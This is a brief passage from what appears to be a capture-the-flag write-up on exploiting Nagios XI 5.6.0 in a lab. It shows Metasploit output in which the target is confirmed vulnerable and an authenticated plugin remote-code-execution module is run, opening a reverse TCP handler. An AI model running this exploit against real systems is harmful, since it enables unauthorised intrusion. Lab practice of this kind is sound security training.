jerrygems/ctfs/monitoring_writeup("nagios_xi")/writeup.md

 [+] Successfully authenticated to Nagios XI
 [*] Target is Nagios XI with version 5.6.0
 [*] 192.168.126.136:80 - The target appears to be vulnerable.
+<h3>hoorey...
+So first one worked and we found that it is vulnerable , Now let's go ahead</h3>
 [msf](Jobs:0 Agents:0) exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) >> run

 [*] Started reverse TCP handler on 192.168.49.126:4444